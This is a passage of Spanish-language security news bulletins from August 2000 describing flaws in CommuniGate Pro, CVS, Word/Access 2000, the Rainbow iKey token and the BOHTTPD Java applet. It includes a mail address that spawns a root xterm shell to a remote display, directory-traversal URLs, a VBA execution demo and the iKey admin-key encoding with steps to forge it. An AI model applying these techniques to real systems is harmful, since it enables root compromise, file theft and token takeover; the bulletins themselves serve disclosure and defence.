trayectoria donde hemos instalado el programa. El servidor web que
incorpora el programa sufre el conocido problema de la escalada de
directorios a través de peticiones "../..". Si hacemos una petición
al mapeo /Guide/ del servidor web de gestión usando esta técnica,
y dado que CommuniGate se ejecuta como superusuario y no libera
sus privilegios, podríamos obtener cualquier fichero del sistema,
incluido el archivos de contraseñas.

Mirando algunas de las funcionalidades de CommuniGate encontramos
la función PIPE, que permite a cualquier usuario mandar mensajes a
un programa en el servidor de correo. Por defecto esta funcionalidad
está desactivada, aunque dado que poseemos la contraseña de gestión,
gracias a la anterior vulnerabilidad, podemos activarla, configurar
el directorio de aplicaciones como /usr/X11R6/bin, incrementar el
tiempo máximo de ejecución de un proceso y mandar un correo a
"xterm -display 172.16.2.4:0.0 -e /bin/sh"@pipe con lo que se nos
abrirá una xterm como root en el escritorio.

Las versiones a partir de la v3.3b2 ya tienen este problema
solucionado, y pueden obtenerse de la web del fabricante
http://www.stalker.com.



Lluis Mora
Fermin J. Serna
http://www.s21sec.com


Más información:

CommuniGate Pro
http://www.stalker.com/CommuniGatePro/

Vulnerabilidades en CommuniGate Pro v3.2.4 (S21SEC)
http://www.s21sec.com/es/avisos/s21sec-003-es.txt



martes, 8 de agosto de 2000

Las inseguridades de las herramientas CVS

Las implementaciones actuales del protocolo CVS (Concurrent Versions
System) permiten que un atacante con permiso de escritura en el almacén
CVS pueda ejecutar código arbitrario en el servidor en el que reside el
almacén.
CVS (Concurrent Versions System) es un sistema de control de versiones,
especialmente utilizado durante el desarrollo de proyectos de software.
Permite que un grupo de colaboradores trabajen juntos en un proyecto,
y controlar en cada momento la versión y los cambios que cada uno de
ellos tiene en su propia copia del "almacén", así se identifican conflictos
entre versiones, se pueden crear "ramas" divergentes de desarrollo, etc.

En definitiva, se trata de una herramienta que nos permite tener
perfectamente identificado el estado de un proyecto (admite, incluso,
retroceder y empezar una nueva "rama"). Ni que decir tiene que en el
mundo Internet, CVS permite la cooperación de desarrolladores distantes
entre sí miles de kilómetros. De hecho, es el sistema empleado para
coordinar el desarrollo del Kernel Linux y del servidor web Apache, por
ejemplo, dos pilares de la estrategia "open source".

Típicamente CVS tiene dos modos de funcionamiento: anónimo y
autentificado. En el modo anónimo, los usuarios sólo pueden conectarse
al almacén en modo lectura, mientras que en el modo autentificado, los
desarrolladores pueden realizar cambios en el proyecto.

Lamentablemente las implementaciones actuales de CVS permiten que
cualquier desarrollador con privilegios de escritura en el almacén pueda
ejecutar código arbitrario en el servidor CVS. Aunque se entiende que
dichas personas son confiables, los administradores CVS deben ser
conscientes de que asignar privilegios de escritura a un desarrollador
supone, en la práctica, los mismos privilegios que o más que si dicha
persona tuviese un acceso SHELL a la máquina en cuestión.

Aunque este hecho esté señalado en la documentación CVS, conviene
recordarlo a los administradores de sistemas de forma periódica, para
evitar sorpresas. Lamentablemente, en el momento actual, no existen
implementaciones CVS diseñadas para evitar este problema, aunque se
trabaja activamente en "wrappers" para mejorar su seguridad.



Jesús Cea Avión
jcea@hispasec.com


Más información:

Concurrent Versions System:
http://cvshome.org/

CVS Local Denial of Service Vulnerability:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1136

CVS Client Server-Instructed File Create Vulnerability:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1523

CVS Checkin.prog Binary Execution Vulnerability:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1524

CVSWeb insecure perl "open" Vulnerability:
http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D1469



lunes, 7 de agosto de 2000

Ejecución automática de código a través de Word

Una vez más Georgi Guninski descubre un agujero en un producto de
Microsoft, en esta ocasión el problema puede permitir la ejecución
arbitraria de código al abrir un documento de Microsoft Word 2000.
Microsoft Word puede aceptar bases de datos MS Access 2000 como entrada
para una operación de fusión de mensajería, la opción diseñada para
creación de mailings automáticos a partir de los registros de una base
de datos Access. Sin embargo la base de datos puede contener código
Visual Basic diseñado para ejecutarse cuando se abra desde MS Word.
Dicho código puede estar programado para llevar a cabo acciones en
el sistema del usuario sin su conocimiento.

Esta vulnerabilidad afecta a MS Word y MS Access 2000, con o sin el
Service Release 1a, pero también puede explotarse al visitar una página
web con Internet Explorer o abrir o previsualizar un mensaje html con
Outlook. Para que el documento word lleve a cabo su dañina acción debe
tener acceso al archivo mdb con el que se enlaza.

La demostración que ofrece Guninski es sencilla, basta con crear una
base de datos e incluir el código para que abra un formulario al cargar
la base de datos y ejecute el código VBA incluido. Por ejemplo:

Private Sub Form_Load()
On Error GoTo Err_Command0_Click
Dim stAppName As String
stAppName = "C:\Program Files\Accessories\wordpad.exe"
MsgBox ("Trying to start: " & stAppName)
Call Shell(stAppName, 1)

Exit_Command0_Click:
Exit Sub

Err_Command0_Click:
MsgBox Err.Description
Resume Exit_Command0_Click
End Sub

Luego se debe crear un documento Word que emplee dicha base datos,
bastará seleccionar Herramientas/Combinar correspondencia.../
Crear/Etiquetas postales/Ventana activa/Obtener datos/Abrir...
y enlazar el MDB que se ha creado para la ocasión.



Antonio Ropero
antonior@hispasec.com


Más información:

Bugtraq:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-08-01&msg=398EB9CA.27E03A9C@nat.bg



domingo, 6 de agosto de 2000

Ataque físico a iKey

Cualquier usuario con acceso a un dispositivo iKey puede leer y
escribir cualquier información almacenada en su interior, sin necesidad
de introducir el PIN del usuario.
iKey es un dispositivo USB de la empresa Rainbow Technologies, ideado
para actuar como "testigo" o "token" y almacenar en su interior
certificados, claves de acceso, credenciales y demás información
confidencial que pueda poseer un usuario. Dicha información está
teóricamente protegida por una clave personal, pero en la práctica
todos los datos del usuario son accesibles si se utiliza una clave
administrativa. Dicha clave administrativa puede ser grabada por el
atacante, por lo que éste puede programar el dispositivo iKey para
responder a la clave administrativa que desee y, por tanto,
proporcionarle acceso total al mismo.

Para realizar estas operaciones, el atacante necesita desmontar y
reprogramar el iKey, tarea sencilla y barata, tan sólo necesita
materiales accesibles a cualquier persona.

La clave administrativa por defecto es "rainbow" (el nombre del
fabricante), y su valor se almacena codificado con el algoritmo de hash
MD5. Sólo se utilizan los 8 bytes superiores del hash, que se almacenan
"codificados" en la memoria externa de iKey. Dicha codificación es muy
sencilla:

Sean a1..a8 los 8 primeros bytes del hash MD5, los 8 bytes
"codificados" resultantes son:

b1 = a1 XOR 0x1F
b2 = a2 XOR (a1 + 0x01)
b3 = a3 XOR 0x0F
b4 = a4 XOR (a3 + 0x10)
b5 = a5 XOR 0x1F
b6 = a6 XOR (a5 + 0x07)
b7 = a7 XOR 0x0F
b8 = a8 XOR (a7 + 0xF3)

Así pues, un atacante que desease grabar una nueva clave administrativa
de su elección, solo tendría que:

1. Calcular el hash MD5 de dicha clave.
2. Tomar los 8 primeros bytes del hash.
3. "Codificar" esos 8 bytes utilizando las fórmulas anteriores.
4. Almacenar esa codificación en la memoria, a partir de la posición 8.

Otro ataque posible es acceder a iKey mediante el HASH MD5 de la clave
administrativa original. Para ello:

1. Se lee el hash codificado de la memoria de iKey
2. Recuperamos los 8 primeros bytes del hash original utilizando las
fórmulas *inversas* a las indicadas con anterioridad.
3. Suministramos a iKey el valor de dicho hash (para lo cual hay que
utilizar "drivers" específicos).

Esto es posible porque a iKey sólo se le envía el hash MD5 de la clave,
no la clave en sí.

Este ataque es similar al encontrado hace unos meses para el testigo
"eToken" de Aladdin.



Jesús Cea Avión
jcea@hispasec.com


Más información:

iKey:
http://ikey.rainbow.com/

iKey 1000 Administrator Access and Data Compromise:
http://www.l0pht.com/advisories/ikey-admin.txt

Ataque físico a Aladdin eToken 3.3.3.x:
http://www.hispasec.com/unaaldia.asp?id=562

MD5:
ftp://ftp.rediris.es/docs/rfc/13xx/1321



sábado, 5 de agosto de 2000

Agujero en el "Web-Troyano"

Hace apenas dos días nos hacíamos eco de un grave problema de
seguridad en la implementación Java de Netscape, que permitía instalar
un applet que actúa de servidor web al compartir archivos locales de
los clientes. Un agujero de seguridad en el propio applet que sirve
como demostración, y que permite a priori restringir el directorio a
compartir, deja al descubierto toda la información del disco duro de
los usuarios.
El problema parte de la posibilidad de ir subiendo niveles de
directorios si se pasa el parámetro "\.." en la URL. De esta forma es
posible recorrer todo el disco duro de los usuarios que estén
probando "BOHTTPD" y descargar cualquier fichero, lo que incluye
archivos de contraseñas e información sensible. Esta labor se
facilita gracias a un apartado de la web, "BOHTTPD Spy", donde se
mantiene una lista actualizada de las direcciones de los usuarios
que están probando el applet.

Por ejemplo, si alguien aparece en el listado de la página de
demostración de la siguiente forma:

http://direcciónIP:8080/c:/WINNT/MP3

En teoría, el usuario está compartiendo sólo el contenido de la
carpeta MP3. Sin embargo, si se utiliza la siguiente URL:

(En Netscape)
http://direcciónIP:8080/c:/WINNT/MP3/\../\../

(En IExplorer)
http://direcciónIP:8080/c:/WINNT/MP3/%5C../%5C../

Conseguiremos subir dos niveles de directorios, y aparecerá en
nuestro navegador todo el contenido del disco duro del usuario,
con la posibilidad de navegar entre los distintos directorios
y descargar cualquier fichero. Se recomienda, claro está, no
hacer uso de la demostración, así como desactivar el soporte
Java en los navegadores de Netscape hasta que se desarrolle el
parche correspondiente, que afecta a las versiones 4.x de
Communicator tanto en plataformas Windows como Linux.

Opina sobre esta noticia

Más información:

"Web-Troyano" gracias a los navegadores de Netscape
http://www.hispasec.com/unaaldia.asp?id=646

BOHTTPD Spy
http://www.brumleve.com/BrownOrifice/BOHTTPD_spy.cgi

Brown Orifice HTTPD Homepage
http://www.brumleve.com/BrownOrifice/




Bernardo Quintero
bernardo@hispasec.com